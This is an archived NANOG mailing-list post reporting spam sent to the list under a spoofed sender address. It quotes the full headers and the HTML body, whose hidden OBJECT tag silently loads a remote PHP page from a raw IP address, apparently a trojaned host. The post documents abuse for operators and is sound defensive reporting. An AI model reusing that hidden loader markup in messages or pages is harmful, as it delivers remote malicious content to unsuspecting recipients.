now what - spam to nanog spoofing susan harris?

Suresh Ramasubramanian suresh at outblaze.com
Thu Mar 18 02:48:59 UTC 2004 

Mailed out through an open proxy / hacked machine in some australian 
museum, with a body that tries to load this html page - 
http://24.84.218.164:81/641280.php

Page is hosted on a shawcable conection (probably another trojaned box) 
that I can't seem to access, though the host is barely pingable

	srs

> Return-Path: <owner-nanog at merit.edu>
> Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26])
> 	by corpmail.outblaze.com (Postfix) with ESMTP
> 	id B199316DD9F; Thu, 18 Mar 2004 02:43:17 +0000 (GMT)
> Received: by trapdoor.merit.edu (Postfix)
> 	id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
> Received: by trapdoor.merit.edu (Postfix, from userid 56)
> 	id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
> Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
> 	by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F
> 	for <nanog at trapdoor.merit.edu>; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
> Received: by segue.merit.edu (Postfix)
> 	id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
> Received: from PH02887.net (unknown [203.18.63.43])
> 	by segue.merit.edu (Postfix) with SMTP id 8220D5DE34
> 	for <nanog at merit.edu>; Wed, 17 Mar 2004 21:40:43 -0500 (EST)
> Delivered-To: nanog-outgoing at trapdoor.merit.edu
> Delivered-To: nanog at trapdoor.merit.edu
> Delivered-To: nanog at merit.edu
> Date: Thu, 18 Mar 2004 13:40:35 +1000
> To: nanog at merit.edu
> Subject: Request response
> From: srh at merit.edu
> Message-ID: <xpvmqgksfnpfrcuagqc at merit.edu>
> MIME-Version: 1.0
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-Mailer: Microsoft Outlook Express 6.00.2600.0000
> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
> Content-Type: text/html; charset=us-ascii
> Content-Transfer-Encoding: 7bit
> Sender: owner-nanog at merit.edu
> Precedence: bulk
> Errors-To: owner-nanog-outgoing at merit.edu
> X-Loop: nanog
> X-AntiVirus: checked by Vexira MailArmor (version: 2.0.1.11; VAE: 6.24.0.7; VDF: 6.24.0.61; host: corpmail.outblaze.com)
> 
> 
> <html><body>
> <font  face="System">
> <OBJECT STYLE="display:none"  DATA="http://24.84.218.164:81/641280.php">
> </OBJECT></body></html>

More information about the NANOG mailing list